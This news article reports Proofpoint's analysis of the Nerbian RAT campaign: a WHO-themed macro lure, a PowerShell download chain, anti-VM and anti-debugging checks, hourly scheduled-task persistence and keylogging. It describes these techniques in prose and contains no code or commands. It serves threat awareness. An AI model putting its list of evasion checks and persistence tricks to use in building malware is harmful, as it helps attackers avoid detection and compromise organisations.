Nerbian RAT malware uses significant anti-analysis and anti-reversing capabilities along with multiple open-source Go libraries to conduct malicious activity. Credit: v-graphix / Getty Images Researchers at cybersecurity vendor Proofpoint have analyzed a new remote access Trojan (RAT) malware campaign using sophisticated evasion techniques and leveraging COVID-19 themed messaging to target global organizations. The malware, dubbed “Nerbian RAT” and written in the Go programming language, uses significant anti-analysis and anti-reversing capabilities and open-source Go libraries to conduct malicious activities, the researchers stated.The campaign was first analyzed by Proofpoint in late April and disproportionately impacts entities in Italy, Spain and the UK. In a statement, Proofpoint Vice President Threat Research and Detection Sherrod DeGrippo said the research demonstrates how malware authors continue to operate at the intersection of open-source capability and criminal opportunity.Low-volume RAT malware spoofs WHO, leverages COVID-19 pandemicStarting on April 26, 2022, Proofpoint researchers observed a low-volume malware campaign targeting multiple industries with emails claiming to be representing the World Health Organization (WHO) sharing important information regarding COVID-19. The emails included an attached Word document containing macros that, when opened, revealed information relating to COVID-19 safety, self-isolation, and caring for individuals.“Interestingly, the lure is similar to themes used in the early days of the pandemic in 2020, specifically spoofing the WHO to distribute information about the virus,” the researchers wrote. The documents also contain logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI), Proofpoint added. Nerbian RAT demonstrates macro-enabled attack path, code re-useWhen the macros are enabled, the document executes an embedded macro that drops a .bat file which performs a PowerShell invoke web request (IWR) and renames the downloaded file to UpdateUAV.exe before dropping it into a victim’s hard drive, the researchers said. “UpdateUAV.exe is the payload initially downloaded from the malicious Word document. It is a 64-bit executable, written in Golang, 3.5MB in size, and UPX packed,” they wrote. “Likely, this malware is packed with UPX to reduce the overall size of the executable being downloaded. Unpacked, the file is 6.6MB in total.”Proofpoint named this malware “Nerbian RAT” based on one of the function names in the dropper. Researchers noted that the UpdateUAV executable features significant code re-use, with strings referencing various GitHub projects. Nerbian RAT’s sophisticated evasion techniquesNerbian RAT demonstrates several sophisticated evasion techniques, Proofpoint said. For example, the dropper will stop execution upon encountering certain conditions, including if:The size of the hard disk on the system is less than 100GB.The name of the hard disk contains virtual, vbox or vmware strings.The MAC address queried returns certain OUI values.Specific reverse engineering/debugging programs are present.exe, RAMMap.exe, RAMMap64.exe, or vmmap.exe memory analysis/memory tampering programs are present.In addition to the anti-reversing checks, Proofpoint identified other anti-analysis checks present in the binary including:Use of IsDebuggerPresent API to determine if the executable is being debuggedQueries for the following network interface names: Intel PRO/1000 MT Network Connection, Loopback Pseudo-Interface 1, and Software Loopback Interface 1Malware demonstrates ability to log keystrokes, communicates over SSLIf enablement is achieved, the dropper will then attempt to establish a scheduled task named MicrosoftMouseCoreWork to start the RAT payload hourly to establish persistence, Proofpoint said. “The dropper’s end-goal is to download the executable named SSL, save it as MoUsoCore.exe, and configure a scheduled task to run it hourly as its primary persistence mechanism.”Nerbian RAT also appears to have a variety of different functions including the ability to log keystrokes and, like most modern malware families, prefers to handle its communications over SSL, Proofpoint continued.“Despite all this complexity and care being taken to protect the data in transit and “vet” the compromised host, the dropper and the RAT itself do not employ heavy obfuscation outside of the sample being packed with UPX, which it can be argued isn’t necessarily for obfuscation, but to simply reduce the size of the executable,” Proofpoint researchers concluded. “Additionally, much of the functionality of both the RAT and the dropper are easy to infer due to the strings referring to GitHub repositories.” Related content news Almost 50% of organizations plan to reduce cybersecurity headcounts: Survey While organizations are realizing the need for knowledgeable teams to address unknown threats, they are also looking to reduce their security headcount and infrastructure spending. By Gagandeep Kaur Dec 06, 2023 4 mins IT Jobs Security Practices feature 20 years of Patch Tuesday: it’s time to look outside the Windows when fixing vulnerabilities After two decades of regular and indispensable updates, it’s clear that security teams need take a more holistic approach to applying fixes far beyond the Microsoft ecosystem. By Susan Bradley Dec 06, 2023 6 mins Patch Management Software Threat and Vulnerability Management Windows Security feature What should be in a company-wide policy on low-code/no-code development Low-code/no-code development could bridge the gulf of development backlogs that exists between great ideas and great execution of digital innovation. But not without security policies around areas like access control, code quality, and application vi By Ericka Chickowski Dec 06, 2023 15 mins Application Security Security Practices news analysis Cisco unveils AI-powered assistants to level up security defenses New AI-driven tools aim to simplify and bolster policies, alerts and prevention to reduce complexity when setting security policies and assess traffic without decryption. By Rosalyn Page Dec 05, 2023 5 mins Encryption Cloud Security Podcasts Videos Resources Events SUBSCRIBE TO OUR NEWSLETTER From our editors straight to your inbox Get started by entering your email address below. Please enter a valid email address Subscribe